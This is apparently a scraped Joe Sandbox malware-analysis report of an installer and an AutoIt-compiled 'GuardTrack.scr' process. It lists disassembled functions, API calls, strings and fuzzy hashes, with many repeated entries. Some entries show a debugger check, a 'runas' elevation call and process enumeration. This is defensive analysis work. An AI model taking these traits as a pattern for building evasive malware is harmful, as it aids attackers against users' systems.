Associated: 00000000.00000002.2020247233.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020551896.0000000000873000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wfJfUGeGT3.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":
API String ID: 589700163-165019052
Opcode ID: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
Instruction ID: a09026506d824dbf9e13ec1e4905f02e05ac7e50fa84eba4f97cb212d859c974
Opcode Fuzzy Hash: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
Instruction Fuzzy Hash: 6F11E71185062159DB30EB259C4097BB6F8EE99760752843FE9C6F32C0EB7C8CA1D2BD

Function 0040505D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 0040506D

Part of subcall function 00403DC5: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DD7

OleUninitialize.OLE32(00000404,00000000), ref: 004050BB

Part of subcall function 004062B9: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E8F,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062C6
Part of subcall function 004062B9: wvsprintfW.USER32(00000000,?,?), ref: 004062DD

Strings

Section: "%s", xrefs: 0040508F
Skipping section: "%s", xrefs: 004050CB

Memory Dump Source

Source File: 00000000.00000002.2020201383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2020186399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020218138.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020551896.0000000000873000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wfJfUGeGT3.jbxd

Similarity

API ID: InitializeMessageSendUninitializelstrlenwvsprintf
String ID: Section: "%s"$Skipping section: "%s"
API String ID: 2266616436-4211696005
Opcode ID: 99d14f7043e79d3d8086908b3cabd6d308359c9a829abfe0eea5bc0ae8c4af9b
Instruction ID: 72b980f80c28ecfcd0407e0dace594f9e180666c0886337011194864861aae86
Opcode Fuzzy Hash: 99d14f7043e79d3d8086908b3cabd6d308359c9a829abfe0eea5bc0ae8c4af9b
Instruction Fuzzy Hash: D2F0D1368246009AE2106755BD06B6A77A4DF85711F68403FFF40B22E1DF7D18418AAD

Function 004032D2 Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000,00403719,00000001,?,?,?,00000000,00403A5D,?), ref: 004032E5
GetTickCount.KERNEL32 ref: 00403303
CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A5D,?), ref: 0040332E

Memory Dump Source

Source File: 00000000.00000002.2020201383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2020186399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020218138.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020551896.0000000000873000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wfJfUGeGT3.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: ac63fb45ebae7e502b517329f215a40213becb05cb1b7459b7d9d9338ff04f82
Instruction ID: 97d955eecb999c6cc4ecec0c264b20ab0036741e5c77e3c2fc1849182f84e521
Opcode Fuzzy Hash: ac63fb45ebae7e502b517329f215a40213becb05cb1b7459b7d9d9338ff04f82
Instruction Fuzzy Hash: 5BF05E30506620EBC2206FA4FE5CBAB7F68F704B82B41447EF541B12A4CB384951CBDC

Function 00405C55 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,007D5AB0,Error launching installer), ref: 00405C7A
CloseHandle.KERNEL32(?), ref: 00405C87

Strings

Error launching installer, xrefs: 00405C5E

Memory Dump Source

Source File: 00000000.00000002.2020201383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2020186399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020218138.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020551896.0000000000873000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wfJfUGeGT3.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: c30e874c0dd13dafab9eec4149781a552473f0f0671de2e9495985384250c353
Instruction ID: e53b0d2e07ed5cc42b65f46c088a0ffbd9ee82f7db84de32081c625a94508254
Opcode Fuzzy Hash: c30e874c0dd13dafab9eec4149781a552473f0f0671de2e9495985384250c353
Instruction Fuzzy Hash: C9E0ECB0900219ABEB009F64DE49D7B7FBCFB40305B408526A955E2250D778D8148AA8

Function 004062B9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E8F,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062C6
wvsprintfW.USER32(00000000,?,?), ref: 004062DD

Part of subcall function 004060FD: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062EA,00000000), ref: 00406114

Strings

RMDir: RemoveDirectory invalid input(""), xrefs: 004062BB, 004062C0

Memory Dump Source

Source File: 00000000.00000002.2020201383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2020186399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020218138.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020551896.0000000000873000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wfJfUGeGT3.jbxd

Similarity

API ID: CloseHandlelstrlenwvsprintf
String ID: RMDir: RemoveDirectory invalid input("")
API String ID: 3509786178-2769509956
Opcode ID: 7855ac2f6164c7a2629bb99e179585e0bc82677cf2e10cbf779388d075bdbb21
Instruction ID: 2883f6fdbb75122e7c86ea7043297328e8e8306c32113c26ceb0f942655100f9
Opcode Fuzzy Hash: 7855ac2f6164c7a2629bb99e179585e0bc82677cf2e10cbf779388d075bdbb21
Instruction Fuzzy Hash: 1ED0523429460EAACA009BA0EE1DE1A3B79EF80304F84843EF046820B0EA389002CB0D

Function 00405DCC Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00406BE9,?,00000000,00000000,?,00000000,00406BE9,00000000,[Rename]), ref: 00405DDC
lstrcmpiA.KERNEL32(00000000,00406BE9), ref: 00405DF4
CharNextA.USER32(00000000,?,00000000,00406BE9,00000000,[Rename]), ref: 00405E05
lstrlenA.KERNEL32(00000000,?,00000000,00406BE9,00000000,[Rename]), ref: 00405E0E

Memory Dump Source

Source File: 00000000.00000002.2020201383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2020186399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020218138.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020551896.0000000000873000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wfJfUGeGT3.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
Instruction ID: 154379d1c5420fb8949bca2a3232bbf94181924a40fc586370f8f53582277720
Opcode Fuzzy Hash: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
Instruction Fuzzy Hash: 1AF06235105558EFC7019FA5DD0499F7BA8EF56350B2540AAE840E7311D634DE019FA9

Analysis Process: GuardTrack.scrPID: 7788, Parent PID: 7732COMMON

Execution Graph

Execution Coverage:	3.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	2.4%
Total number of Nodes:	2000
Total number of Limit Nodes:	113

Executed Functions

Function 005C5240 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 147windowCOMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 005C526C
IsDebuggerPresent.KERNEL32 ref: 005C527E
GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 005C52E6

Part of subcall function 005C1821: _memmove.LIBCMT ref: 005C185B

Part of subcall function 005BBBC6: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 005BBC07

SetCurrentDirectoryW.KERNEL32(?), ref: 005C5366
MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 00600B2E
SetCurrentDirectoryW.KERNEL32(?), ref: 00600B66
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00666D10), ref: 00600BE9
ShellExecuteW.SHELL32(00000000), ref: 00600BF0

Part of subcall function 005C514C: GetSysColorBrush.USER32(0000000F), ref: 005C5156
Part of subcall function 005C514C: LoadCursorW.USER32(00000000,00007F00), ref: 005C5165
Part of subcall function 005C514C: LoadIconW.USER32(00000063), ref: 005C517C
Part of subcall function 005C514C: LoadIconW.USER32(000000A4), ref: 005C518E
Part of subcall function 005C514C: LoadIconW.USER32(000000A2), ref: 005C51A0
Part of subcall function 005C514C: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 005C51C6
Part of subcall function 005C514C: RegisterClassExW.USER32(?), ref: 005C521C

Part of subcall function 005C50DB: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 005C5109
Part of subcall function 005C50DB: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 005C512A
Part of subcall function 005C50DB: ShowWindow.USER32(00000000), ref: 005C513E
Part of subcall function 005C50DB: ShowWindow.USER32(00000000), ref: 005C5147

Part of subcall function 005C59D3: _memset.LIBCMT ref: 005C59F9
Part of subcall function 005C59D3: Shell_NotifyIconW.SHELL32(00000000,?), ref: 005C5A9E

Strings

runas, xrefs: 00600BE4
AutoIt, xrefs: 00600B23
It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 00600B28

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
API String ID: 529118366-2030392706
Opcode ID: d667334926ad22a9e573f9c920a09f18c8dbec733a34a1c4c2e530b7394afb12
Instruction ID: 8a039d3bb025e5285d0cac04fc31c9395979f0798eacad7cf275426c7d735b1d
Opcode Fuzzy Hash: d667334926ad22a9e573f9c920a09f18c8dbec733a34a1c4c2e530b7394afb12
Instruction Fuzzy Hash: C8512530948249AEDB05AFF0DC09FEE7F7ABB86740F10506DF565621A3DEB05A85CB21

Function 005C5D13 Relevance: 10.7, APIs: 7, Instructions: 223COMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(?), ref: 005C5D40

Part of subcall function 005C1821: _memmove.LIBCMT ref: 005C185B

GetCurrentProcess.KERNEL32(?,00640A18,00000000,00000000,?), ref: 005C5E07
IsWow64Process.KERNEL32(00000000), ref: 005C5E0E
GetNativeSystemInfo.KERNELBASE(00000000), ref: 005C5E54
FreeLibrary.KERNEL32(00000000), ref: 005C5E5F
GetSystemInfo.KERNEL32(00000000), ref: 005C5E90
GetSystemInfo.KERNEL32(00000000), ref: 005C5E9C

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
String ID:
API String ID: 1986165174-0
Opcode ID: eae1cd81c460bf6a91e0e6bdf229d5f2845fd6d80f0c7862322fe418586ce711
Instruction ID: 6a1f445362eb10303a00d5181a0bacc8fa67a89f4ed0a28f05c7f94b610f2056
Opcode Fuzzy Hash: eae1cd81c460bf6a91e0e6bdf229d5f2845fd6d80f0c7862322fe418586ce711
Instruction Fuzzy Hash: 1E91A431589BC0DED731CBE88450AABBFE57F66300B884A9ED0C797741E630B688D759

Function 00614148 Relevance: 6.1, APIs: 4, Instructions: 85processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0061416D
Process32FirstW.KERNEL32(00000000,?), ref: 0061417B
Process32NextW.KERNEL32(00000000,?), ref: 0061419B
FindCloseChangeNotification.KERNELBASE(00000000), ref: 00614245

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32
String ID:
API String ID: 3243318325-0
Opcode ID: 8ba63e9989118575f2c7fcb2bfdae22f6987ef817c55fddfe48159721e948fdf
Instruction ID: fb8d9395ada8f1411cdfdddc771cf20c7b34c282e8f8cc3294790eb7a5e79a9c
Opcode Fuzzy Hash: 8ba63e9989118575f2c7fcb2bfdae22f6987ef817c55fddfe48159721e948fdf
Instruction Fuzzy Hash: DB3130711083429FD304DFA0D885FAEBBE9BFD6350F54052DF585831A1EB719A89CB92

Function 005BB020 Relevance: 5.6, APIs: 3, Instructions: 1146COMMON

Download Yara Rule

APIs

Part of subcall function 005C3740: CharUpperBuffW.USER32(?,006771DC,00000001,?,00000000,006771DC,?,005B53A5,?,?,?,?), ref: 005C375D

_memmove.LIBCMT ref: 005BB68A

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: BuffCharUpper_memmove
String ID:
API String ID: 2819905725-0
Opcode ID: b7b87ba1d0a5747bbb0225795397981455c5ef335d81a5d434f2e5aca167465d
Instruction ID: 671944914f9c269b12d782ab5a5b563cc4dfe7fd0e4ff5315b305e926928a5dc
Opcode Fuzzy Hash: b7b87ba1d0a5747bbb0225795397981455c5ef335d81a5d434f2e5aca167465d
Instruction Fuzzy Hash: 31A267706087419FE720DF18C484BAABBE1BF84304F14895DE99A8B362D7B5FD45CB92

Function 005B94E0 Relevance: 3.5, APIs: 2, Instructions: 539COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d5ac5441697eccc35e2d7147e9d753e728ef45f732b51ae0dcd15b55dbedf17d
Instruction ID: 68baf08aca8bdf1e31d671a887ce4cbff248e873bfde9058c68daa950a76c314
Opcode Fuzzy Hash: d5ac5441697eccc35e2d7147e9d753e728ef45f732b51ae0dcd15b55dbedf17d
Instruction Fuzzy Hash: 4E22BF7490421ADFDB24DF58C484AFEBBF0FF49300F24856AEA569B351D734A981CB91

Function 005BBC70 Relevance: 50.4, APIs: 22, Strings: 6, Instructions: 1379sleeptimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 005BBF57

Part of subcall function 005B52B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 005B52E6

Sleep.KERNEL32(0000000A,?,?), ref: 005F36B5

Strings

@TRAY_ID, xrefs: 005F3FCD
CALL, xrefs: 005BC277
@GUI_WINHANDLE, xrefs: 005F37C1
@GUI_CTRLID, xrefs: 005F376C
@COM_EVENTOBJ, xrefs: 005F3D2E
@GUI_CTRLHANDLE, xrefs: 005F3816

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: MessagePeekSleepTimetime
String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$CALL
API String ID: 1792118007-922114024
Opcode ID: ac5572a50d2ef3ff3f39979baa485e74a6aff6ceac4211f80a6d5b4795d67c93
Instruction ID: d48248d2e72e5b4edb7789317eca87678b10ad7f5ee2b882fbb77af120e9a055
Opcode Fuzzy Hash: ac5572a50d2ef3ff3f39979baa485e74a6aff6ceac4211f80a6d5b4795d67c93
Instruction Fuzzy Hash: CDC29070608346DFE728DF24C848BAABFE5BF84304F14491DF58A972A1DBB5E944CB46

Function 005B33E7 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 72windowregistryCOMMON

Download Yara Rule

APIs

GetSysColorBrush.USER32(0000000F), ref: 005B3444
RegisterClassExW.USER32(00000030), ref: 005B346E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 005B347F
InitCommonControlsEx.COMCTL32(?), ref: 005B349C
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 005B34AC
LoadIconW.USER32(000000A9), ref: 005B34C2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 005B34D1

Strings

TaskbarCreated, xrefs: 005B3474
AutoIt v3 GUI, xrefs: 005B3460
0, xrefs: 005B3426
+, xrefs: 005B342D

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: ffda37eba85e4bbaf2edccb6fd9131fcf6dd079e3dd61b1186adf0c6ec33fea8
Instruction ID: 9bffbbc032fdd48e2439409b60377ec1664c267cb5b3daaf35ba00369536ce86
Opcode Fuzzy Hash: ffda37eba85e4bbaf2edccb6fd9131fcf6dd079e3dd61b1186adf0c6ec33fea8
Instruction Fuzzy Hash: 99314975855319EFEB40CFA4EC88AC9BBF2FF09310F10512AE694E62A0E3B55581CF91

Function 005B3411 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54windowregistryCOMMON

Download Yara Rule

APIs

GetSysColorBrush.USER32(0000000F), ref: 005B3444
RegisterClassExW.USER32(00000030), ref: 005B346E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 005B347F
InitCommonControlsEx.COMCTL32(?), ref: 005B349C
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 005B34AC
LoadIconW.USER32(000000A9), ref: 005B34C2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 005B34D1

Strings

TaskbarCreated, xrefs: 005B3474
AutoIt v3 GUI, xrefs: 005B3460
0, xrefs: 005B3426
+, xrefs: 005B342D

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: d55320d9a201108909f19be15fba3e2f95be12873137a2fea3f463efdbbebef1
Instruction ID: e5d8dc29dd80aa25b01bf5bcf6933bed3b792f14147264e97166f3629912b36c
Opcode Fuzzy Hash: d55320d9a201108909f19be15fba3e2f95be12873137a2fea3f463efdbbebef1
Instruction Fuzzy Hash: AE21E8B5955318AFEB00DF94EC48BDD7BF6FB09700F00511AFA15A62A0D7B11580CF92

Function 005C2FC5 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON

Download Yara Rule

APIs

Part of subcall function 005D00CF: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,005C3094), ref: 005D00ED

Part of subcall function 005D08C1: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,005C309F), ref: 005D08E3

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 005C30E2
